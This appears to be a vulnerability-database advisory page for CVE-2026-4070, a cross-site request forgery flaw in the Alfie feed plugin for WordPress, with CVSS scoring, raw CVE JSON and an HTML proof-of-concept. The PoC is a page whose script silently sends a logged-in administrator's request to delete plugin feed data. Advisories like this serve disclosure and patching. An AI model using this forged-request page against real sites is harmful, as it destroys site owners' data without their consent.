Security Vulnerability Report
中文
CVE-2026-4070 CVSS 4.3 MEDIUM

CVE-2026-4070

Published: 2026-05-22 05:16:27
Last Modified: 2026-05-22 05:16:27

Description

The Alfie – Feed Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing nonce validation on the alfie_manage() function which handles feed deletion via the 'delete' GET parameter. This makes it possible for unauthenticated attackers to delete arbitrary plugin feed data (from alfie_colindex, alfie_producten, alfie_reactions, and alfie_searchproduct tables) via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Alfie – Feed Plugin <= 1.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-4070 --> <!-- This PoC demonstrates a CSRF attack to delete a feed item. --> <html> <body> <h1>CVE-2026-4070 CSRF PoC</h1> <p>Attempting to trigger deletion...</p> <script> // The vulnerable endpoint accepts a 'delete' parameter via GET request. // The administrator must be logged into the WordPress site for this to work. // Replace 'http://target-site.com' with the actual target URL var targetUrl = 'http://target-site.com/wp-admin/admin.php?page=alfie-manage&delete=1'; // Use fetch to send the request. The browser automatically includes cookies. fetch(targetUrl, { method: 'GET', credentials: 'include' }) .then(response => { console.log('Request sent successfully'); }) .catch(error => { console.error('Error sending request:', error); }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4070", "sourceIdentifier": "[email protected]", "published": "2026-05-22T05:16:27.233", "lastModified": "2026-05-22T05:16:27.233", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Alfie – Feed Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing nonce validation on the alfie_manage() function which handles feed deletion via the 'delete' GET parameter. This makes it possible for unauthenticated attackers to delete arbitrary plugin feed data (from alfie_colindex, alfie_producten, alfie_reactions, and alfie_searchproduct tables) via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/tags/1.2.1/include/alfie-manage.php#L58", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/tags/1.2.1/include/alfie-manage.php#L60", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/trunk/include/alfie-manage.php#L58", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/trunk/include/alfie-manage.php#L60", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/af36719a-8f7d-46dc-a697-cfcbb08e45e2?source=cve", "source": "[email protected]"}]}}